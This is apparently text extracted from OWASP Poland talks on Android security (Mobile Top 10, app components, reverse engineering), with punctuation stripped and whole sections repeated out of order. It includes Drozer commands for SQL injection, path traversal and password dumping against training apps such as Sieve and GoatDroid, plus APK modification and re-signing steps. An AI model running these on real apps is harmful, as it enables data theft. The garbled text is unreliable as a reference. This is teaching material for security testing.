bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Agendabull Android Architecturebull Android security fundamentalsbull Android 60 security releasebull Google security features
Introbull Android is the worlds most popular mobile platformFeaturesbull Multi-taskingbull Widgetsbull Notificationsbull Voice Typing and Actionsbull Photos and videobull Most widely used smartphone OSbull Phones tablets Google TV and more
Statsbull There are 12 billion mobile users By 2018 that number with
be 5 billion bull Mobile adoption is growing 8x faster than traditional web
applications bull Mobile payments will exceed $90 Billion by 2017
Bugcrowd Cybersecurity Research 2015
Android Architecture
Linux Kernelbull The architecture is based on the Linux ( started from 26)
kernel bull This layer is core of android architecture It provides
service like power management memory management security etc
bull It helps in software or hardware binding for better communication
Librariesbull The next layer is the Androidrsquos native libraries bull It is this layer that enables the device to handle different types
of data bull The WebKit library is responsible for browser support SQLite is
for database FreeType for font support Media for playing and recording audio and video formats
Android Runtimebull Core librariesbull Dalvik Virtual Machinebull DVM vs JVM Differencesbull ART
Dalvik VMbull The software that runs the apps on Android devicesbull Its fast even on weak CPUs bull it will run on systems with little memory bull it will run in an energy-efficient way bull Provides application portability and runtime consistency bull Runs optimized file format (dex) and Dalvik bytecodebull Java class jar files converted to dex at build time
ART VS DVMbull Android 44 ndash Experimental From android 50 - Defaultbull Ahead-of-time (AOT) compilationbull Improved garbage collectionbull Improved diagnostic detail in exceptions and crash reports
Application FrameworkActivity Manager Manages the activity life cycle of applications
Content Providers Manage the data sharing between applications
Telephony Manager Manages all voice calls
Location Manager Location management using GPS or cell tower
Resource Manager Manage the various types of resources we use in our Application
Application Layer bull SMS client appbull Dialerbull Web browserbull Contact manager
APK how itrsquos works
Android Application Security
bull Android sandbox
bull Permission labels defined in AndroidManifestxml
bull Signature
bull Install time security decisionsbull Android 60 Security release
Android 60bull Runtime Permissionsbull Verified Bootbull Hardware-Isolated Security bull Fingerprintsbull SD Card Adoptionbull Clear Text Traffic bull System Hardeningbull USB Access Control
Defense layers
Google Play
1 2 3 4 5
Require and validate
Developer information
Review Applications
before distribution
Permanently stop
distribution
Reduce attacker flexibility
Remove applications
after installation
Apps from Unknown Sources
By default only Google Play and other pre-installed app stores are allowed to install apps
The vast majority of installs come from Google Play
Verify AppsApps are verified prior to install
Warn for or block Potentially Harmful Applications
Over 10 million installs verified every day
Verifying is on and visible when need
Core security features to build secure applicaton
bull The Android Application Sandboxbull An application framework with robust implementations of common
security functionality such as cryptography permissionsbull An encrypted file system that can be enabled to protect data on lost
or stolen devicesbull User-granted permissions to restrict access to system features and
user databull Application-defined permissions to control application data on a
per-app basis
Thank you
Any questions
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
